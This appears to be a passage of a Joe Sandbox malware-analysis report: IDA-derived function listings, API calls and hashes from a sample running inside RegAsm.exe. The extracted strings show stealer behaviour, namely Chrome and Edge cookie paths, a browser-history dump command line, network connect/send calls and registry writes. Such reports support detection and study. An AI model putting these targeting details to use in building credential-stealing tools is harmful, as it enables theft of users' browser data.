                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                • __freea.LIBCMT ref: 0045129D
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                • String ID:
                                                                • API String ID: 313313983-0
                                                                • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                • _free.LIBCMT ref: 100071B8
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                • _free.LIBCMT ref: 0044F43F
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                • _free.LIBCMT ref: 10005BB4
                                                                • _free.LIBCMT ref: 10005BDB
                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                • _free.LIBCMT ref: 00448353
                                                                • _free.LIBCMT ref: 0044837A
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                APIs
                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                • String ID:
                                                                • API String ID: 2951400881-0
                                                                • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$lstrcat
                                                                • String ID:
                                                                • API String ID: 493641738-0
                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                APIs
                                                                • _free.LIBCMT ref: 100091D0
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100091E2
                                                                • _free.LIBCMT ref: 100091F4
                                                                • _free.LIBCMT ref: 10009206
                                                                • _free.LIBCMT ref: 10009218
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                APIs
                                                                • _free.LIBCMT ref: 00450A54
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450A66
                                                                • _free.LIBCMT ref: 00450A78
                                                                • _free.LIBCMT ref: 00450A8A
                                                                • _free.LIBCMT ref: 00450A9C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                APIs
                                                                • _free.LIBCMT ref: 1000536F
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 10005381
                                                                • _free.LIBCMT ref: 10005394
                                                                • _free.LIBCMT ref: 100053A5
                                                                • _free.LIBCMT ref: 100053B6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                APIs
                                                                • _free.LIBCMT ref: 00444106
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00444118
                                                                • _free.LIBCMT ref: 0044412B
                                                                • _free.LIBCMT ref: 0044413C
                                                                • _free.LIBCMT ref: 0044414D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                APIs
                                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                                • _free.LIBCMT ref: 0044E8D5
                                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                • String ID: *?$.
                                                                • API String ID: 2812119850-3972193922
                                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                APIs
                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,013E6988,00000010), ref: 004048E0
                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                • String ID: XQG$NG$PG
                                                                • API String ID: 1634807452-3565412412
                                                                • Opcode ID: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                • _free.LIBCMT ref: 10004CE8
                                                                • _free.LIBCMT ref: 10004CF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 2506810119-1068371695
                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                • _free.LIBCMT ref: 004435E0
                                                                • _free.LIBCMT ref: 004435EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 2506810119-1068371695
                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BFB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                • API String ID: 368326130-3219657780
                                                                • Opcode ID: 72d71ca1ca92f56ac952f73673ea2402e26b1a6c877ca60da89600d4813981e8
                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                • Opcode Fuzzy Hash: 72d71ca1ca92f56ac952f73673ea2402e26b1a6c877ca60da89600d4813981e8
                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00416330
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen$CloseCreateValue
                                                                • String ID: !D@$okmode$PG
                                                                • API String ID: 3411444782-3370592832
                                                                • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                APIs
                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                APIs
                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                Memory Dump Source
